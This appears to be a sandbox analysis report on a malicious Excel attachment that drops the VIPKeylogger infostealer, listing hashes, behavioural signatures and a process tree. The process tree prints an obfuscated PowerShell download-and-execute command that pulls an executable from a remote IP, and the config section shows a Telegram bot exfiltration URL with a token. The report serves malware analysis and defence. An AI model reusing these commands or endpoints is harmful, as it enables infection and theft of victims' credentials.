Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 07:07
Static task
static1
Behavioral task
behavioral1
Sample
ALFATECH-4500068045.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ALFATECH-4500068045.xls
Resource
win10v2004-20240802-en
General
-
Target
ALFATECH-4500068045.xls
-
Size
331KB
-
MD5
02b90b88aed63a901dbcb9f1c06e34c1
-
SHA1
0744024e070c8840acf9f787c18d279c242d1734
-
SHA256
a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d
-
SHA512
b9394b6b59287940a94faceda10c584aae3155765e4bb88bbda4b04fe3bc23a1bf44951398ba723913c2c0c661a77c3efb6b000ff5a2efc312dc95c4bf81f901
-
SSDEEP
6144:c/WOvPZ8NdyOseQAz1Wapbb2zIFhzBvxaLqRRZYj+oUzCJeYILmCL1P:IWOX+PsJAz1p9fhzBIqRR4+BYILt1
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7121690251:AAEuf5zFrwn6F6mTVPJTwU5P1nN1ULFLElA/sendMessage?chat_id=7071568333
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2944 mshta.exe 11 2944 mshta.exe 13 2128 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2128 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 264 sihost.exe -
Loads dropped DLL 1 IoCs
pid Process 2128 powershell.exe -
resource yara_rule behavioral1/files/0x0006000000019372-58.dat upx behavioral1/memory/264-65-0x00000000008A0000-0x0000000000A2D000-memory.dmp upx behavioral1/memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp upx -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 264 set thread context of 268 264 sihost.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sihost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2556 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2128 powershell.exe 2128 powershell.exe 2128 powershell.exe 268 RegSvcs.exe 268 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 264 sihost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 268 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 264 sihost.exe 264 sihost.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 264 sihost.exe 264 sihost.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2556 EXCEL.EXE 2556 EXCEL.EXE 2556 EXCEL.EXE 2556 EXCEL.EXE 2556 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2944 wrote to memory of 2188 2944 mshta.exe 32 PID 2944 wrote to memory of 2188 2944 mshta.exe 32 PID 2944 wrote to memory of 2188 2944 mshta.exe 32 PID 2944 wrote to memory of 2188 2944 mshta.exe 32 PID 2188 wrote to memory of 2128 2188 cmd.exe 34 PID 2188 wrote to memory of 2128 2188 cmd.exe 34 PID 2188 wrote to memory of 2128 2188 cmd.exe 34 PID 2188 wrote to memory of 2128 2188 cmd.exe 34 PID 2128 wrote to memory of 112 2128 powershell.exe 35 PID 2128 wrote to memory of 112 2128 powershell.exe 35 PID 2128 wrote to memory of 112 2128 powershell.exe 35 PID 2128 wrote to memory of 112 2128 powershell.exe 35 PID 112 wrote to memory of 2912 112 csc.exe 36 PID 112 wrote to memory of 2912 112 csc.exe 36 PID 112 wrote to memory of 2912 112 csc.exe 36 PID 112 wrote to memory of 2912 112 csc.exe 36 PID 2128 wrote to memory of 264 2128 powershell.exe 37 PID 2128 wrote to memory of 264 2128 powershell.exe 37 PID 2128 wrote to memory of 264 2128 powershell.exe 37 PID 2128 wrote to memory of 264 2128 powershell.exe 37 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 PID 264 wrote to memory of 268 264 sihost.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2556
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2912
-
-
-
C:\Users\Admin\AppData\Roaming\sihost.exe"C:\Users\Admin\AppData\Roaming\sihost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\sihost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:268
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD50231a37c450fd71f499a766ae7cde4c1
SHA1f7f3c7c55ef4a628173ea34e7697f8526b083d2b
SHA2564e0dd896a5b11132d722b155cde5f03a61807583cc413bd91e04fc2c4ccc3dcd
SHA5126bd6f7b8ff82f52eb754ab490a03453117e67973bcb53ed7233e167a663b26578b8b4da1a907bc99b535b3cb9294b0907e054eb427a0677898ebbc1adfc4bbf6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5183cf0f46c5d878b4da3706777d441a7
SHA1662d0457e60699c16a3f4978c0f4d7a2fa41ee24
SHA25654a5b037f119c7c72288e8938f3b0d1fb9be28ceee4712df639ebd1fec9bebb1
SHA5120c79c1fdb6135dbd9845493fb8201e3a067f4ec831fdc05d7623435cc39ec492dabffa890d9626e0f3f2c575780312e502205fb94d7656e0438693a3412b4bfa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD55c0c586fcc0295465e226ba96427cf97
SHA1d52cd521b3847f56dfe33c4b858b86063a33a584
SHA2565b698c684d3e08ec24433ea3bdecc350406f9b4934d4ec5d66b68e51d2f9a08d
SHA512e71aa78a5a62fbdd763f4b6f0f741f68567504777b2aeff429c9ae51296d2d562e671ca95b793b53f67152443806ad956b3c9f6705a4fcf2a50323f5ddd025a4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\icreamnet[1].hta
Filesize12KB
MD57103c506472571a74df192733c3a951f
SHA1e33b0379480d8796cc6f076240e4bedd4ed491d3
SHA256c71171c8f9e4481d14b506d2ae0c37ef7702e610e898bcf146c72523c86aec7f
SHA5122f61230549b40684e797e044935bfe1fb74d969abf185087aebd2b8f9cffdefb09bef7eeb381d8ce492e877eae00131405eb961e284a0c87f76b819dafc759b5
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD59fc4d43938ebb2a9c1a6a5c9e8e1b7da
SHA12cccc89f39e676854fa9c81b591f0c5ea154b97f
SHA25627838d11900ed1b250a86cc776bc5edba978128c944a371065c74c00a4cbd153
SHA51232b4fbbd96fe1b6fddd3427ec725f3cb5684fec095d4107dbd9bcfddfc5256d4f5a13879f57901299ef9ef0c0c4229158467398fc16b106c6f4515716f34890e
-
Filesize
3KB
MD569329fad78578ff7b1c18ab40d90f650
SHA122be61573dba4a668eb79dcf447185d3b966678d
SHA2562376de8780975313d031cf80e11904d5c23bc2d70701e6b59515824b6e20eee4
SHA512227c108cb1e3e594ddb12dad2ef8b4a3a9a7b4797b495f78073ac7708bf82094409ba59b28f21d625c15117714525c701578ddf8d60ec4d440167c2c1ced1115
-
Filesize
7KB
MD516cfde2da53cade58911abeebc95cbe8
SHA1f0b8a9b295d92f515044a6f59e6247fca8cf6091
SHA2563b3e179c787f21c82988759e6f801dc1091190e78d01edcff64f2382e966acf7
SHA5124fd6cc9b4f9790a5bc9fea1fd336ff2fec82ca8f36bd2fc7cec3282c47fa24c0e6e074e906683edc61255006b4026f32579f58a68ed38f93d9ae2a92f3ebe510
-
Filesize
707KB
MD5cf7c1cb71ad11a8c4ab07ffc3afa2f67
SHA168c5f1c0e97237c4fff232e099353792b160df1a
SHA2566eb12a217689847fa90ae6ac61401fe0349653808da3e4386abf01ee4f56e2f9
SHA512997d7e6bcd9aa8ac33f6bb667edfe40efc522f47dd54284895b15736edb86052284409a3a6a9ab1c9e9066f507599a1824cf6a935849cb7346e2464c90ccb904
-
Filesize
652B
MD57b62578350fbc3e85a2c8ee625ad270f
SHA1e1454131de8f74f5d918b719903122ca29ee2fb3
SHA256852cc899d42c51ca2c327c5775481ca7bba3e075e670794fa8964973fbebd554
SHA512ae891dc02a7efdb525ad3c7e36cb23cf61768da2871200c58914b175bcac598c5215acafc14788bf60c3fe3289946f0c35395d435d8405df8928dd4339a7186a
-
Filesize
473B
MD5602090135e2e0d9cd49e6059ebe19206
SHA1aff8001ee39f6d2b36cd1b74f87c22b152c55580
SHA256b4f6cf69835c797d9964ff6ed7bd8223ade6e4c80053ee0659d2cf6d1fd4c8b9
SHA512664b7d40c32eaa692af57d2afdc4f0235c8062b354177d490868dce23b1b91bae33ad567b8a700a9c50e66fa507a1a9404faba92bfec26c4dfa21425ea5c83e1
-
Filesize
309B
MD5fa15298a795e8bfc3b0cb550e623c67c
SHA1a33e468fb287322ac76c443884ab2ce769211277
SHA2569ca437fe90a7d431850a3364d39cc66a981baa00ec91901b221a4a0d6f515489
SHA5129814e53d180703a03673ca6721f52f8a6d2051362e53994992d26f745af71d5061c9e4c1d1d407afed7dc603e014b73b8df51706b9c316440a92a4e52abef29a